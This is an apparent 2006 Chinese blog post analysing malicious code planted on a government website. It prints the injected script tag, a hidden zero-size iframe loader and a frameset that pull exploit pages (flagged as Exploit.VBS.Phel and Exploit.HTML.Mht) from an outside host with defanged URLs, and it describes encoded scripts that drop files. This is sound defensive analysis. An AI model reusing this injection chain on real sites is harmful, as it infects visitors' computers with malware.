某政府网站被加入的自动下载病毒文件的代码再创新花样(第1版)

本文分析了一个政府网站被植入恶意代码的情况。恶意代码通过复杂的框架结构及加密手段尝试下载并生成有害文件,其中包括Exploit.VBS.Phel及Exploit.HTML.Mht等。这些恶意文件可能对访问者的计算机造成威胁。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

endurer 原创

2006.01.23 第1

今天浏览前几天说的那个被加入恶意代码的政府网站(详见: 某政府网站被加入的自动下载病毒文件的代码变了花样(第1版) ),又发现了新花样。

政府网站首页加入的代码为:


<script language="JavaScript" src="hxxp://www.***snqc.cn/images/mail.js"></script>


mail.js的内容为:



document.write("<iframe src=hxxp://www.***snqc.cn/images/error.htm width=0 height=0></iframe>");



error.htm的内容为:



<frameset rows="444,0" cols="*">
<frame src=" hxxp://help.3721.com/error.html" framborder="no" scrolling="auto" noresize marginwidth="0" margingheight="0">
<frame src="top.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
<frame src="gif.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
<frame src=" hxxp://help.3721.com/error.html" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
</frameset>


top.htm 瑞星报为:Exploit.VBS.Phel.z,江民KV报为:Exploit.VBS.Phel.ab,Kaspersky报为:Exploit.VBS.Phel.be。

gif.htm 瑞星报为:Exploit.HTML.Mht,江民KV不报,Kaspersky报为:Exploit.HTML.Mht。

top.htm的内容是用escape()加密的脚本。此脚本会尝试生成文件c:/WINDOWS/Help/apps.chm,自动下载:hxxp://www.***snqc.cn/images/tzd.js。

tzd.js的内容也是用escape()加密的脚本,其中部分代码使用escape()加密了两次。此脚本会尝试生成文件C:/AUTOEXEC.COM,c:/NTDETECT.hta。

tzd.js:瑞星和江民KV报为Exploit.VBS.Phel,Kaspersky报为:Exploit.VBS.Phel.bq。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值